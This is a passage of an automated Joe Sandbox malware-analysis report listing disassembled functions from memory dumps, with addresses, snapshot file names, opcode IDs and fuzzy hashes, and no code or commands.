                                                                                      Function 00007FFD9BBF2D60 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ca666cf727f8bd2b1048dcd9e3f06d3175ace509fa08c9d1d1481521f0f1581
                                                                                      • Instruction ID: 82f3d669f72a0b0d7af58e86d93c76c1d51130bbb0fbbbedc04994a6017463d7
                                                                                      • Opcode Fuzzy Hash: 3ca666cf727f8bd2b1048dcd9e3f06d3175ace509fa08c9d1d1481521f0f1581
                                                                                      • Instruction Fuzzy Hash: 82B01211F0E2074BF63020F504AC07C4FC19F8464EFD60A32B12BC71E2DCAD2A0A1110
                                                                                      Function 00007FFD9B7E06C8 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                                      • Instruction ID: 7dfa2ccd67bafb43316ebcd086f37e4d9a2ff4600fea076885164cdbc23362f0
                                                                                      • Opcode Fuzzy Hash: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                                      • Instruction Fuzzy Hash: 07B01200D5B50F00E43431FB18A306474405F45104FC20270D40C802B1984D12940262
                                                                                      Function 00007FFD9B7E30A2 Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 834d5f9d6b9d45f7fceb3518b3ef4bc363d09a1b9a0c9f5ea7f642bcbef181a9
                                                                                      • Instruction ID: d1b5f9dac8e1a45d61f46764b83f2915da57bf421668076f4c6b7b6add144273
                                                                                      • Opcode Fuzzy Hash: 834d5f9d6b9d45f7fceb3518b3ef4bc363d09a1b9a0c9f5ea7f642bcbef181a9
                                                                                      • Instruction Fuzzy Hash: D9B01210F0A11DC6F3A0A140C06273C31880F01B00F074131D40E775F1CD1C2D814741
                                                                                      Function 00007FFD9BBF2F4A Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68f34c3b3e72bf3d437eb4902a45668d135c994d5871d7ce3bcb564642de3738
                                                                                      • Instruction ID: 3fcb713a8304d49d3f7d90167fec7fe176147bf03122198cf93790844dcc36ca
                                                                                      • Opcode Fuzzy Hash: 68f34c3b3e72bf3d437eb4902a45668d135c994d5871d7ce3bcb564642de3738
                                                                                      • Instruction Fuzzy Hash: 2FA00204F0E91E45E47176E400E22BD44413F49605B624431E00E856F6CE1CAB061697

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B7C0D48 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5\_H
                                                                                      • API String ID: 0-3325266018
                                                                                      • Opcode ID: f63b4cb3078c0ce9048a1bccba5b3ec75da77f22dc3c87c5db6fb538d0a20cfa
                                                                                      • Instruction ID: 5eac6df88b0ab4a73d75da3bfb808e9122d37ff4ee53f2a7e2c3be8017a59d89
                                                                                      • Opcode Fuzzy Hash: f63b4cb3078c0ce9048a1bccba5b3ec75da77f22dc3c87c5db6fb538d0a20cfa
                                                                                      • Instruction Fuzzy Hash: 5C9121B1A19A8E5FE759DF688869BB9BFE0FB55310F0001BED059C73E6DB7824008740
                                                                                      Function 00007FFD9B7C0B3F Relevance: 3.8, Strings: 3, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: c9$!k9$"s9
                                                                                      • API String ID: 0-3426396564
                                                                                      • Opcode ID: 3efba0b2dfb799383282180210f61f4ca41bd01aa0ef8a13ce432796815085de
                                                                                      • Instruction ID: 6df3e40dc8ca5c0ce8b7f295e97b606dcf492aa51b7982d67eac5967c5a261b8
                                                                                      • Opcode Fuzzy Hash: 3efba0b2dfb799383282180210f61f4ca41bd01aa0ef8a13ce432796815085de
                                                                                      • Instruction Fuzzy Hash: 96F0F93671D54A9FD701BA7EB8408DA379CDB89135B9601BBE104C7262D210185A87E0
                                                                                      Function 00007FFD9B7C08E8 Relevance: .1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 993fae611c5db00616e872b2eadf9cf3e9a78b4f3cd4f514ff1f1a5fe22865ca
                                                                                      • Instruction ID: 999488e6daa638a2bac8e1df460110c60f2b22175a9eb17e2bbc4533b2e21148
                                                                                      • Opcode Fuzzy Hash: 993fae611c5db00616e872b2eadf9cf3e9a78b4f3cd4f514ff1f1a5fe22865ca
                                                                                      • Instruction Fuzzy Hash: 6231253270D9184FE768EA5CE89A9B977D0EF4532171602BFE48AC7276DD11EC8287C1
                                                                                      Function 00007FFD9B7C090D Relevance: .1, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5647164d5d20d0a2539d5eb1cc40100abab5e31fca9800f453884e5655bd0d82
                                                                                      • Instruction ID: 09f350360919ffeedd2b830821d5523243d771dffcb8ccc9ee31f4e5f439a76f
                                                                                      • Opcode Fuzzy Hash: 5647164d5d20d0a2539d5eb1cc40100abab5e31fca9800f453884e5655bd0d82
                                                                                      • Instruction Fuzzy Hash: F1314B12F0D6991EE318F3B864ADAFC3791DF88326B1545BBD04DC72EBDD1868818285
                                                                                      Function 00007FFD9B7C0998 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 248a13611b1faa86910891f13b6d1e8ccdd827d84444aa472ce0ec2dd4d5e91f
                                                                                      • Instruction ID: 4908394d14ef015ca5e1b6f37321b573f3f516ca19c6b29be7da27732a9fa52f
                                                                                      • Opcode Fuzzy Hash: 248a13611b1faa86910891f13b6d1e8ccdd827d84444aa472ce0ec2dd4d5e91f
                                                                                      • Instruction Fuzzy Hash: A3213820B19A1D1FF798F76C946AA7972C2EB98312F5101BDE40DC33FBDC18AC418245
                                                                                      Function 00007FFD9B7C0C25 Relevance: .1, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41221a6ab6e72a4b1130621464892e1657b782e88e659e2a8934a9beabd28c8f
                                                                                      • Instruction ID: 5ae673c0726b98dbdf70e9846f014d0ec030dbce7127d904850f07d79d3c2dc9
                                                                                      • Opcode Fuzzy Hash: 41221a6ab6e72a4b1130621464892e1657b782e88e659e2a8934a9beabd28c8f
                                                                                      • Instruction Fuzzy Hash: 07212336F0D34EAEE322F6A898554EC3B70DF41324F1682B7D0089A2E3D93826468691
                                                                                      Function 00007FFD9B7C5745 Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eb8e855f42eb4b2a812f52355200cba70a7e5abb5ebc9c017f6b2d453c81330c
                                                                                      • Instruction ID: 2bbedd2a69adb0c09b634fe334df1f25f2844bfe7a8283229b8ee2f6164230ff
                                                                                      • Opcode Fuzzy Hash: eb8e855f42eb4b2a812f52355200cba70a7e5abb5ebc9c017f6b2d453c81330c
                                                                                      • Instruction Fuzzy Hash: AF214F20F1AA0D5BE7B4F65498666B873D1FF48700F5202BDD84DD33B2EE286E444685
                                                                                      Function 00007FFD9B7C0C38 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 962ae8247a3e49566c778f33cd29d56fdb04d149d3e38e4822535da51817e206
                                                                                      • Instruction ID: f8af697228e728ea43f15a1a4d8cc55c0e8f9d0fb86cb996d33767853ae8d08f
                                                                                      • Opcode Fuzzy Hash: 962ae8247a3e49566c778f33cd29d56fdb04d149d3e38e4822535da51817e206
                                                                                      • Instruction Fuzzy Hash: B911AC32A0D34DAFE712EBA8D8555E97BB4AB41314F1642B7D044DB2E2EA3426068790
                                                                                      Function 00007FFD9B7C108D Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4b4e2d1b68ff11afa51bfa1bf093d3dd8b4e8c35be769a2e66be8287a38e4083
                                                                                      • Instruction ID: 82199a0038d955102f1a95a2a80dbe97b98bc8e4b00fb36652cba76ed2992f36
                                                                                      • Opcode Fuzzy Hash: 4b4e2d1b68ff11afa51bfa1bf093d3dd8b4e8c35be769a2e66be8287a38e4083
                                                                                      • Instruction Fuzzy Hash: 9F01A71198E6D51FD36957B04C715B17F95DF8721070A02FED095CB6B3C84D59868351
                                                                                      Function 00007FFD9B7C0C40 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a3d4afe981952317ebbcffe0041e8e1f879ded514963ad70a8da870f5f5dea3
                                                                                      • Instruction ID: 1c1b016eb7941038c548b1d27ddd9ad0abdc57a9afd0185b97a13fab92c27d3f
                                                                                      • Opcode Fuzzy Hash: 1a3d4afe981952317ebbcffe0041e8e1f879ded514963ad70a8da870f5f5dea3
                                                                                      • Instruction Fuzzy Hash: E401CC32A0934DAFE712EBA4C8545ED7BB0EF42314F1642BBD444DB2E2DA3867498790
                                                                                      Function 00007FFD9B7C0C48 Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: afdf7f50cb99b82afe2de37aea77097e109d3286ebbc674c654e4af0e4776852
                                                                                      • Instruction ID: 74faa8a2f2f1d7555ee14e879c72c401ffca6b38fff99ee46acc2b2caa6e952c
                                                                                      • Opcode Fuzzy Hash: afdf7f50cb99b82afe2de37aea77097e109d3286ebbc674c654e4af0e4776852
                                                                                      • Instruction Fuzzy Hash: 05019A32A0938D9FD712EBA4C8545EDBBB0AF42314F1642EBD404DB2A2EA386645C791
                                                                                      Function 00007FFD9B7C5843 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                                      • Instruction ID: 7732b1e30cb999398dafba6b82410086fa6438345160c656a7306797d02a06f8
                                                                                      • Opcode Fuzzy Hash: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                                      • Instruction Fuzzy Hash: 0D016230A0961E9BE774BA44D8627F873A0FB54301F5142BDC84ED33B2DE386E814A45
                                                                                      Function 00007FFD9B7C0C50 Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ed285b5497c1d22391619d67066bd793da0e14c07598309c904abad86a6a7bf
                                                                                      • Instruction ID: 904ae656c648ee1d28d9175d78e70ca833fc900fcd377429313c1002c3153601
                                                                                      • Opcode Fuzzy Hash: 6ed285b5497c1d22391619d67066bd793da0e14c07598309c904abad86a6a7bf
                                                                                      • Instruction Fuzzy Hash: F6018B31E09389AFD711EBA4C8945EDBBB0AF02304F1542E6D404CB2A6EA386744C791
                                                                                      Function 00007FFD9B7C35BC Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0663b05c0328e88a15c5f0402982a7cc45c860a2531f7fe8d1c975b384704d44
                                                                                      • Instruction ID: 5ee1ce840d11702daef79102069eb0680d0fee2e07be814dc2abdc6040e7d5de
                                                                                      • Opcode Fuzzy Hash: 0663b05c0328e88a15c5f0402982a7cc45c860a2531f7fe8d1c975b384704d44
                                                                                      • Instruction Fuzzy Hash: B6F0E130A48A1C8FDB55EF04C895AAAB3B1FBA8311F0142A9D40ED7365DA35AE45CF85
                                                                                      Function 00007FFD9B7C0B77 Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1c5d7b8c50f1a12128ecbaea94c944db2cfc122b4bcf95d9f737eb778966a488
                                                                                      • Instruction ID: 54bb3e2312c4c2814602cf482d3c4b5ff3efd294f4ff8d2eafe2260d341e45aa
                                                                                      • Opcode Fuzzy Hash: 1c5d7b8c50f1a12128ecbaea94c944db2cfc122b4bcf95d9f737eb778966a488
                                                                                      • Instruction Fuzzy Hash: FBE0223420DA49CFD305EB79CC948927BA0FF0A214BEA00EEE048CB622D220086DCB10
                                                                                      Function 00007FFD9B7C10C0 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3b80cfadc25e2e7e19b777ab5a22fe6f2daeff55043e19e32d250aa1f56de5e
                                                                                      • Instruction ID: f59add93f82d161fbd2839cdde7d1f6b074d72dcf13257b7c80983a59fc15f2b
                                                                                      • Opcode Fuzzy Hash: c3b80cfadc25e2e7e19b777ab5a22fe6f2daeff55043e19e32d250aa1f56de5e
                                                                                      • Instruction Fuzzy Hash: 43E08625B5C85906EBACBA7468B25B57281DB85314B0516BDD02AC26DAEC595CC14381
                                                                                      Function 00007FFD9B7C5447 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                                      • Instruction ID: cc1fadd2651cae73e881d4ed3850b968124cb9621f6abf92e0f5edde08aae317
                                                                                      • Opcode Fuzzy Hash: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                                      • Instruction Fuzzy Hash: E8E09230B0A20A97F770A684C4603B93224EF84300F16017CE91E937F1DD2CAF408B45
                                                                                      Function 00007FFD9B7C6A7D Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 892be69a51f068d372e6f3c321c29e56c81bcc9c2a05381ff254fb66f4ac4421
                                                                                      • Instruction ID: 47c7257a77d0b79b8bf010ca2d9ff1f4475cdbb83b2fcf582f1ac403a915ca24
                                                                                      • Opcode Fuzzy Hash: 892be69a51f068d372e6f3c321c29e56c81bcc9c2a05381ff254fb66f4ac4421
                                                                                      • Instruction Fuzzy Hash: FDE08C02F2D24A16F36CB6A808363B8A181DBA9700F0A42BDE45ED33F3DC0C2A400392
                                                                                      Function 00007FFD9B7C06A5 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d219e769d2fde12c7450e079baa21683eee67dbf60759a0515fd54ed3aef9aa
                                                                                      • Instruction ID: 6f9f113f50f3f29c8ff77a4c8bcb40a84e4275845303be2b2ca90ad41e2219e5
                                                                                      • Opcode Fuzzy Hash: 6d219e769d2fde12c7450e079baa21683eee67dbf60759a0515fd54ed3aef9aa
                                                                                      • Instruction Fuzzy Hash: 27C01200F0FA0E20E43035EA14220BCB1005BC4A10FD2033AD009503B1980E22850186
                                                                                      Function 00007FFD9B7C0B18 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac08d3592d3d8194044a73ad7b904a2861d7badd4d702d5ae38e67d6fd400711
                                                                                      • Instruction ID: 7b9a32156abb4816c1a1c39780c3407379cde77c179397fd62d6f969a944c1dc
                                                                                      • Opcode Fuzzy Hash: ac08d3592d3d8194044a73ad7b904a2861d7badd4d702d5ae38e67d6fd400711
                                                                                      • Instruction Fuzzy Hash: D7C08C305118088FC900F72CC88481032E0FB0D210BC20190E00DC7274E21A9C80C700
                                                                                      Function 00007FFD9B7C1280 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                                      • Instruction ID: 5a2d97d4575bd3d875dc82ee6f7b67ed9587f2b5098a10acec6285e2c6ba28ab
                                                                                      • Opcode Fuzzy Hash: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                                      • Instruction Fuzzy Hash: EBC08C30A1180C8FC908FB28C88481833A0FB09201BC20090E00AC7270D219DCD1C741
                                                                                      Function 00007FFD9B7C3A97 Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d94d05fa109fe0cdea32dd943f100d487cd251521c0266549b3b0e784b2d18f8
                                                                                      • Instruction ID: 54cd874dff44560a54c5b0f9df65ecb23ef4399d4a4eef008762494b892514c4
                                                                                      • Opcode Fuzzy Hash: d94d05fa109fe0cdea32dd943f100d487cd251521c0266549b3b0e784b2d18f8
                                                                                      • Instruction Fuzzy Hash: 46C04C11F19C5E56F759621454319BF4443DF84708F9605B8F12E96BEFCD1C5A021387
                                                                                      Function 00007FFD9B7C06C8 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                                      • Instruction ID: d65a7f8ff4fab78599fbaeb97da6bf11faf82665a9df43539bdcdb0f04fc38d9
                                                                                      • Opcode Fuzzy Hash: 189e652472875f4bc8a3a6833c55602404f401b1c9c144337fdce74206230e9e
                                                                                      • Instruction Fuzzy Hash: 52B01200D5F94F10E43431FB0863074B0405B44104FC20374E40C403B1984D13940282
                                                                                      Function 00007FFD9B7C30A2 Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8134893830f9ea2a6da90093eb1f849c04eac524b3ad974206ffb49400665b31
                                                                                      • Instruction ID: 069ba733561b47523358522f50b199664dbaa17599a466846d5538e7d3896a20
                                                                                      • Opcode Fuzzy Hash: 8134893830f9ea2a6da90093eb1f849c04eac524b3ad974206ffb49400665b31
                                                                                      • Instruction Fuzzy Hash: CDB01210E0A11ED6F2A8B280C06063C31488F01310F174539D40EB37F1CC082D414B81